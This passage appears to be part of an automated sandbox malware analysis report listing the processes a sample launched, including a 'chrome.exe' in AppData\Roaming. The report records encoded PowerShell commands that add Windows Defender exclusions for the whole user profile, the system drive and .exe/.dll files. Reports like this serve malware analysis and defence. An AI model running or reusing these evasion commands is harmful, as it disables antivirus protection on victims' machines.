                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:33
                          Start time:01:41:50
                          Start date:27/03/2022
                          Path:C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Users\user\AppData\Roaming\Chrome\chrome.exe
                          Imagebase:0xfa0000
                          File size:2366976 bytes
                          MD5 hash:04F6704BD3AB97905A497BAF3D7FDB3C
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          General

                          Target ID:36
                          Start time:01:42:09
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                          Imagebase:0x7ff7bb450000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:37
                          Start time:01:42:10
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7748d0000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:38
                          Start time:01:42:11
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          General

                          Target ID:39
                          Start time:01:42:19
                          Start date:27/03/2022
                          Path:C:\Windows\System32\dllhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
                          Imagebase:0x7ff6535c0000
                          File size:20888 bytes
                          MD5 hash:2528137C6745C4EADD87817A1909677E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:42
                          Start time:01:42:25
                          Start date:27/03/2022
                          Path:C:\Windows\System32\winlogon.exe
                          Wow64 process (32bit):false
                          Commandline:winlogon.exe
                          Imagebase:0x7ff775840000
                          File size:677376 bytes
                          MD5 hash:F9017F2DC455AD373DF036F5817A8870
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:43
                          Start time:01:42:29
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                          Imagebase:0x7ff7bb450000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:44
                          Start time:01:42:29
                          Start date:27/03/2022
                          Path:C:\Windows\System32\lsass.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\lsass.exe
                          Imagebase:0x7ff765a60000
                          File size:57976 bytes
                          MD5 hash:317340CD278A374BCEF6A30194557227
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:45
                          Start time:01:42:34
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:46
                          Start time:01:42:35
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          General

                          Target ID:47
                          Start time:01:42:37
                          Start date:27/03/2022
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay
                          Imagebase:0x7ff7338d0000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:49
                          Start time:01:42:40
                          Start date:27/03/2022
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM
                          Imagebase:0x7ff7338d0000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          General

                          Target ID:50
                          Start time:01:42:45
                          Start date:27/03/2022
                          Path:C:\Windows\System32\dwm.exe
                          Wow64 process (32bit):false
                          Commandline:dwm.exe
                          Imagebase:0x7ff7aa950000
                          File size:62464 bytes
                          MD5 hash:70073A05B2B43FFB7A625708BB29E7C7
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language

                          Disassembly

                          No disassembly